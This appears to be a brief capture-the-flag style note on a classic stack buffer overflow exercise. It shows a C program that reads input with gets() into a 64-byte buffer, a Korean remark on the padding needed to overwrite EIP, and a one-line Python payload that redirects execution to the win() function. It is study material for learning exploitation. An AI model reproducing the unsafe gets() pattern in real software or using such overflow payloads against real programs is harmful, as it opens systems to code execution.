- #include <stdlib.h>
- #include <unistd.h>
- #include <stdio.h>
- #include <string.h>
- void win()
- {
- printf("code flow successfully changed\n");
- }
- int main(int argc, char **argv)
- {
- char buffer[64];
- gets(buffer);
- }
80byte를 덮으니 eip가 바뀐다 흠 더미가 아마 12byte 정도 붙은것 같은데 뭐 상관없지
payload
(python -c 'print "A"*76 + "\x4d\x84\x04\x08"';cat;) | ./stack4